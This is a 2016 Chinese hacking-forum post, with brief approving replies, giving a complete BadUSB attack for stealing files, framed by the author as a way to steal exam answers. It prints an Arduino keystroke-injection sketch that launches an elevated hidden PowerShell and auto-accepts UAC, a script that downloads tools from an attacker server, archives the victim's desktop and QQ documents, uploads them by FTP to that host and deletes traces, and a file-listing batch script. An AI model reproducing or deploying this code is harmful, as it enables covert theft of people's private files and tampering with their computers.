i3综合社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 2063|回复: 8

[黑客技术] 如何用Badusb快速窃取资料[绕过杀软,绕过UAC,绕过防火墙,绕不过LZ直播吃翔]

[复制链接]

6497

主题

6903

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
13319

活跃会员突出贡献

发表于 2016-4-3 09:11:17 | 显示全部楼层 |阅读模式
如何用Badusb快速窃取资料

[绕过杀软,绕过UAC,绕过防火墙,绕不过LZ直播吃翔]

0×01 引言

又到了期中考试了,我又要去偷答案了,一直发现远程下载运行exe的方式不太好,容易报毒所以这里打算用ps脚本。



0×02 关于HID

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。



0×03 准备工具

一台外网主机(直接电脑接网线宽带拨号也可以)

一个HID攻击工具(烧鹅或者Badusb)

FTPserver(搭建一个FTP服务器用来接收窃取到的文件)

PHPstudy(搭建http服务器用来存放ps脚本等)

7z.exe / 7z.dll(存放到http服务器下,之后会利用它来进行压缩后在上传,尽量减小上传速度)



0×04 代码部分(以下代码可能具有攻击性,请勿用于非法用途)

1.[get.bat](获取需要的文件存放位置,并保存到c:\temp.bat)[该代码存放于服务器http根目录下]

  1. dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.bat

  2. dir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.bat

  3. dir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.bat

  4. dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat

  5. dir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.bat

  6. dir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.bat

  7. dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat

  8. dir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.bat

  9. dir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.bat

  10. dir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.bat

  11. dir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.bat

  12. dir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.bat

  13. dir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.bat

  14. dir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.bat

  15. dir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.bat

  16. dir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.bat

  17. dir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.bat

  18. dir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.bat

  19. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.bat

  20. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.bat

  21. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.bat

  22. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat

  23. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.bat

  24. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.bat

  25. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat

  26. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.bat

  27. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.bat

  28. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.bat

  29. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.bat

  30. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.bat

  31. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.bat

  32. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.bat

  33. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.bat

  34. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.bat

  35. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.bat

  36. dir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat
复制代码
2.[get.ps1](清除运行记录,下载服务器中的7z.dll / 7z.exe / get.bat到c盘到相应位置,处理c:\temp.bat为7z压缩为c:\Ram.7z,上传c:\Ram.7z到FTP服务器根目录下,删除所有下载的文件!!!一共需要改4处IP地址!!!)[该代码存放于服务器http根目录下记得设置FTP服务器密码为admin admin]

  1. reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;

  2. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');

  3. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');

  4. (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');

  5. C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;

  6. $fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");

  7. $ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)

  8. $ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile

  9. $ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")

  10. $ftp.UseBinary = $true

  11. $ftp.UsePassive = $true

  12. $content = [System.IO.File]::ReadAllBytes($fileInf.fullname)

  13. $ftp.ContentLength = $content.Length

  14. $rs = $ftp.GetRequestStream()

  15. $rs.Write($content, 0, $content.Length)

  16. $rs.Close()

  17. $rs.Dispose()

  18. Remove-Item c:\temp.bat

  19. Remove-Item c:\Ram.*

  20. Remove-Item c:\7z.*

  21. Remove-Item c:\Users\Public\get.*
复制代码
3.[get.ino](以管理员权限下载get.ps1到本地c:\users\public目录!!!需要改1处IP地址!!!UAC闪过之后要记得拔出)[修改IP后直接刷入]

  1. void setup() {//初始化

  2.   Keyboard.begin();//开始键盘通讯

  3.   delay(5000);//延时

  4.   Keyboard.press(KEY_LEFT_GUI);//win键

  5.   delay(500);

  6.   Keyboard.press('r');//r键

  7.   delay(500);

  8.   Keyboard.release(KEY_LEFT_GUI);

  9.   Keyboard.release('r');

  10.   Keyboard.press(KEY_CAPS_LOCK);

  11.   Keyboard.release(KEY_CAPS_LOCK);

  12.   delay(500);

  13.   Keyboard.println("POWERSHELL -NOP");

  14.   delay(800);

  15.   Keyboard.println();

  16.   delay(800);

  17.   Keyboard.println("START-PROCESS -fILEpATH POWERSHELL " -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT" -vERB RUNAS;EXIT");

  18.   Keyboard.press(KEY_CAPS_LOCK);

  19.   Keyboard.release(KEY_CAPS_LOCK);

  20.   Keyboard.end();//结束键盘通讯

  21. }

  22. void loop()//循环

  23. {

  24.   Keyboard.release(KEY_LEFT_ALT);

  25.   Keyboard.press(KEY_LEFT_ALT);

  26.   Keyboard.print('y');

  27.   Keyboard.release(KEY_LEFT_ALT);

  28.   Keyboard.release(KEY_LEFT_ALT);

  29.   Keyboard.release(KEY_LEFT_ALT);

  30.   Keyboard.release(KEY_LEFT_ALT);

  31.   delay(50);

  32. }
复制代码
打包下载:

游客,如果您要查看本帖隐藏内容请回复






回复

使用道具 举报

0

主题

36

帖子

131

积分

注册会员

Rank: 2

积分
131
发表于 2016-11-3 09:00:04 | 显示全部楼层
巧了,我也要考试

来自苹果客户端来自苹果客户端
回复 支持 反对

使用道具 举报

0

主题

39

帖子

68

积分

注册会员

Rank: 2

积分
68
发表于 2016-12-31 12:55:03 | 显示全部楼层

RE: 如何用Badusb快速窃取资料[绕过杀软,绕过UAC,绕过防火墙,绕不过LZ直播吃翔]

非常好很强势

回复 支持 反对

使用道具 举报

0

主题

26

帖子

41

积分

新手上路

Rank: 1

积分
41
发表于 2017-6-5 23:44:02 | 显示全部楼层
我只是路过打酱油的

回复 支持 反对

使用道具 举报

0

主题

2

帖子

3

积分

新手上路

Rank: 1

积分
3
发表于 2017-8-3 18:20:52 | 显示全部楼层
正需要,支持楼主大人了!

回复 支持 反对

使用道具 举报

0

主题

166

帖子

279

积分

中级会员

Rank: 3Rank: 3

积分
279
QQ
发表于 2017-8-7 08:35:40 | 显示全部楼层
啥也不说了,感谢楼主分享哇!

墨冰
回复 支持 反对

使用道具 举报

0

主题

46

帖子

81

积分

注册会员

Rank: 2

积分
81
发表于 2017-8-7 14:00:41 | 显示全部楼层
好牛逼啊?

来自安卓客户端来自安卓客户端
回复 支持 反对

使用道具 举报

0

主题

3

帖子

9

积分

新手上路

Rank: 1

积分
9
发表于 2017-9-2 19:05:42 | 显示全部楼层
学习学习,支持支持。

回复 支持 反对

使用道具 举报

0

主题

55

帖子

114

积分

注册会员

Rank: 2

积分
114
发表于 2017-9-7 11:12:20 | 显示全部楼层
阿姐就到家

来自安卓客户端来自安卓客户端
回复 支持 反对

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|i3综合社区 ( 粤ICP备16032410号

粤公网安备 44098102440999号

本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除
联系E-mail:i3zh@qq.com 商务合作QQ:76535901

GMT+8, 2017-10-24 06:34 , Processed in 0.145494 second(s), 38 queries , File On.

Powered by Discuz! X3.3

© 2001-2014 Weixiaoduo.com.

快速回复 返回顶部 返回列表